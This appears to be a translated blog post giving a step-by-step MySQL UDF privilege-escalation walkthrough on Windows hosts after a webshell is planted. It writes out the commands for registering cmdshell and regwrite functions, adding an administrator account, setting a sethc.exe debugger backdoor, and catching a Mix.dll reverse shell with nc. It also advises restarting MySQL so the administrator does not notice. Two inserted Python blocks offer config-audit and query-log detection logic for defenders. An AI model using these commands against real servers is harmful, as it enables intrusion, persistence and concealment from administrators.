I. Function: uses MySQL's own user-defined function (UDF) mechanism (again: escalating privileges through a MySQL UDF is not an overflow, it is a built-in feature of MySQL) to turn a MySQL account into system-level privileges on the host.
II. Application scenarios: 1. the target system is Windows (Win2000, XP, Win2003); 2. you already have a MySQL user account, and that account must have the INSERT and DELETE privileges on the mysql database in order to create and drop functions (as stated in the MySQL documentation).
III. Instructions:
Step 1: upload the PHP file to the target machine and enter your MySQL account details to connect.
Step 2: once the connection succeeds, export the DLL file. The export path usually does not matter (most directories can be written to without permission problems). On newer MySQL versions, however, you must export the DLL into the target's system directory (the Windows directory or system32); otherwise the next step fails with the error "No paths allowed for shared library".
Step 3: use an SQL statement to create the function. Syntax: create function <name> returns string soname '<path of the exported DLL>'; where the function name must be one of those listed below. On MySQL versions later than 5.0 the statement does not accept a full path to the DLL. If you exported the DLL into the system directory in Step 2, omit the path and the statement runs normally; otherwise you get the error "Can't open shared library" and must re-export the DLL into the system directory.
Step 4: once the function has been created, call it with SQL. Syntax: select <function name>('parameter list'); Each function takes different parameters; select <function name>('help'); returns the parameter list of the given function.
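Seen from the server side, the four steps above leave two things a DBA can check for: whether the server is allowed to write a file anywhere and load a library from anywhere, and whether mysql.func contains functions nobody registered on purpose. The following is an added example (not code from the original article); the my.ini snippets and the mysql.func rows are constructed, and the option names are the standard secure_file_priv and plugin_dir settings of the MySQL server.

```python
"""Audit checks against the UDF escalation path described in Steps 2-4.

1. secure_file_priv limits where SELECT ... INTO DUMPFILE may write, so a DLL
   can no longer be dropped into the system directory or plugin directory.
2. plugin_dir pins where CREATE FUNCTION ... SONAME may load a library from;
   it must not be writable by the MySQL service account.
3. Every row in mysql.func is a registered UDF; anything not on the DBA's
   approved list deserves a look.
Added example with constructed inputs, not the article's own code.
"""
import configparser

# Constructed my.ini with no file/plugin restrictions (the weak setting).
WEAK_INI = """
[mysqld]
basedir=C:/mysql
datadir=C:/mysql/data
"""

# Constructed my.ini with both settings pinned (the corrected setting).
HARDENED_INI = """
[mysqld]
basedir=C:/mysql
datadir=C:/mysql/data
secure-file-priv=C:/mysql/export
plugin_dir=C:/mysql/lib/plugin
"""

# Constructed rows, as SELECT name, ret, dl, type FROM mysql.func would return.
FUNC_ROWS = [
    {"name": "cmdshell", "ret": 0, "dl": "udf.dll", "type": "function"},
    {"name": "my_udfdoor", "ret": 0, "dl": "my_udf.dll", "type": "function"},
]

# name -> dll the DBA knowingly installed; empty here (hypothetical allowlist).
APPROVED_FUNCS = {}


def mysqld_options(ini_text):
    """Return the [mysqld] section as a dict with option names normalised."""
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    parser.read_string(ini_text)
    options = {}
    if parser.has_section("mysqld"):
        for key, value in parser.items("mysqld"):
            # MySQL accepts foo-bar and foo_bar as the same option name.
            options[key.replace("-", "_")] = value
    return options


def audit_config(ini_text):
    """Return a list of findings; an empty list means both settings are pinned."""
    options = mysqld_options(ini_text)
    findings = []
    sfp = options.get("secure_file_priv")
    if not sfp or not sfp.strip().strip('"'):
        findings.append("secure_file_priv unset or empty: SELECT ... INTO DUMPFILE "
                        "may write anywhere the service account can")
    if "plugin_dir" not in options:
        findings.append("plugin_dir not pinned: set it explicitly and keep it "
                        "read-only for the MySQL service account")
    return findings


def audit_func_table(rows, approved):
    """Return 'name -> dll' for every mysql.func row not on the approved list."""
    return [f"{row['name']} -> {row['dl']}" for row in rows
            if approved.get(row["name"]) != row["dl"]]


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit_config(ini) or "ok")
    print("unapproved UDFs:", audit_func_table(FUNC_ROWS, APPROVED_FUNCS))
```

The two checks are independent on purpose: a DLL that is already on disk still needs a matching row in mysql.func before it can be called, so the table audit catches a registration even on a server whose file-write setting was fixed too late.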
IV. Function descriptions:
cmdshell: executes a cmd command;
downloader: downloads the specified file from the network and saves it to the specified directory;
open3389: opens the 3389 terminal service; a port can be specified (no restart is needed if the port is left unchanged);
backshell: reverse (bounce) shell;
processview: lists system processes;
killprocess: terminates the specified process;
regread: reads the registry;
regwrite: writes the registry;
shut: shut down, log off, or restart;
about: description and help.
Example of the registry-write function:
select regwrite("HKEY_LOCAL_MACHINE", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe", "Debugger", "REG_SZ", "E:\web\170stock\admin\include\assumer.exe");
Export path by system:
C:\Winnt\udf.dll (Windows 2000)
C:\Windows\udf.dll (Windows 2003)
With the UDF DLL exported to the Windows system directory, the statements are:
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user admins 226404553 /add');
select cmdshell('net localgroup administrators admins /add');
select cmdshell('C:\3389.exe');
drop function cmdshell; (deletes the function)
select cmdshell('netstat -an');
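Every step of the sequence above, from the DLL export to the CREATE FUNCTION, the cmdshell/regwrite calls and the final DROP FUNCTION, passes through the server as a query, so the general query log is the natural place to detect it. The following detection logic is an added example (not code from the original article); the log lines are constructed in the general-log layout rather than captured from a real server, and the function names it watches for are the ones listed in section IV plus the Mixconnect and my_udfdoor names used later on this page.

```python
"""Flag MySQL UDF abuse in general-query-log lines.

Rules: a shared-library registration, its removal, a .dll written through
INTO DUMPFILE/OUTFILE, a call to one of the known UDF names, and a registry
write under Image File Execution Options. Added example; the log sample is
constructed and the names are the ones this page lists.
"""
import re

# Constructed sample in the general log layout: Time  Id  Command  Argument.
SAMPLE_LOG = r"""
100101 12:00:01	   12 Connect	root@10.0.0.5 on php
100101 12:00:02	   12 Query	select id, name from products where id = 3
100101 12:00:03	   12 Query	select 0x4d5a90 into dumpfile 'C:\Windows\udf.dll'
100101 12:00:04	   12 Query	create function cmdshell returns string soname 'udf.dll'
100101 12:00:05	   12 Query	select cmdshell('whoami')
100101 12:00:06	   12 Query	select regwrite('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger', 'REG_SZ', 'C:\tmp\x.exe')
100101 12:00:07	   13 Query	select count(*) from orders
100101 12:00:08	   12 Query	drop function cmdshell
"""

# Function names from section IV of this page plus the two DLLs discussed later.
UDF_NAMES = ("cmdshell", "downloader", "open3389", "backshell", "processview",
             "killprocess", "regread", "regwrite", "shut", "about",
             "mixconnect", "my_udfdoor")

# (rule name, pattern); group 1, when present, is the evidence to report.
RULES = [
    ("udf_register", re.compile(
        r"\bcreate\s+function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']*)'", re.I)),
    ("udf_drop", re.compile(r"\bdrop\s+function\s+(\w+)", re.I)),
    ("file_write", re.compile(
        r"\binto\s+(?:dumpfile|outfile)\s+'([^']*\.dll)'", re.I)),
    ("udf_call", re.compile(r"\b(" + "|".join(UDF_NAMES) + r")\s*\(", re.I)),
    ("ifeo_debugger", re.compile(r"image file execution options", re.I)),
]

# Optional timestamp, connection id, the literal command "Query", the statement.
LINE_RE = re.compile(
    r"^\s*(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+Query\s+(.*)$", re.I)


def scan_general_log(text):
    """Return one (connection_id, rule, evidence) tuple per matching query."""
    findings = []
    for raw in text.splitlines():
        match = LINE_RE.match(raw)
        if not match:            # Connect/Quit lines and blanks carry no statement
            continue
        conn_id, query = match.group(1), match.group(2)
        for rule, pattern in RULES:
            hit = pattern.search(query)
            if hit:
                evidence = hit.group(1) if hit.groups() else hit.group(0)
                findings.append((conn_id, rule, evidence))
    return findings


def connections_to_review(findings):
    """Connection ids that both registered a UDF and then called one."""
    registered = {c for c, rule, _ in findings if rule == "udf_register"}
    called = {c for c, rule, _ in findings if rule == "udf_call"}
    return registered & called


if __name__ == "__main__":
    hits = scan_general_log(SAMPLE_LOG)
    for conn_id, rule, evidence in hits:
        print(f"conn {conn_id}: {rule}: {evidence}")
    print("review connections:", sorted(connections_to_review(hits)))
```

A single udf_register hit is already worth an alert on a server where no one installs UDFs; the connection-level correlation is there so that the rarer legitimate case (a DBA registering a plugin) can be told apart from a session that registers a function and immediately uses it.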
III. Mix.dll privilege escalation
Once a webshell has been obtained, finding the MySQL user and password is not hard. Here I use another machine as the example; I have already uploaded a PHP shell. The account and password used to connect to MySQL are usually easy to find: open a PHP configuration file in the editor and there they are.
Now I have username root, password 123456 and database name php. What next? Use the SQL query feature to connect; the connection succeeds. We can now escalate with the following: first upload Mix.dll and My_udf.dll. Mix.dll is used for a reverse (bounce) connection; My_udf.dll is a forward connection, where you connect directly to the target's port 3306 and enter the password to get a cmd shell. After the upload, register the function with the statement: create function Mixconnect returns string soname 'd:\php\Mix.dll';
The SQL statement executes successfully!
Getting a cmd shell is now close. First listen on a local port with nc: nc -l -p 1234. Then run the statement select Mixconnect('2017.168.1.254', '123'); to trigger the function. It executes successfully; check whether nc has received the connection. The cmd shell is obtained. However, the target's MySQL service hangs afterwards, so we have to kill the MySQL service process and restart the MySQL service; otherwise the administrator will notice that the website no longer works.... If the server is not allowed to connect out to any external IP address and port, but its port 3306 is reachable from outside, My_udf.dll takes the stage. The method is the same as for Mix.dll: after connecting to MySQL, run create function my_udfdoor returns string soname 'd:\php\my_udf.dll'; once that succeeds, activate the function with select my_udfdoor(''); then connect to port 3306 with nc and enter fuck to get a cmd shell.
Privilege escalation summary (Mix.dll):
upload Mix.dll to D:/usr/www/html/mix.dll
mysql -h <destination ip> -uroot -p
\. c:\mysql.txt
select Mixconnect('bounce ip', 'Port');
nc -vv -l -p 1983
From: mer4en7y's blog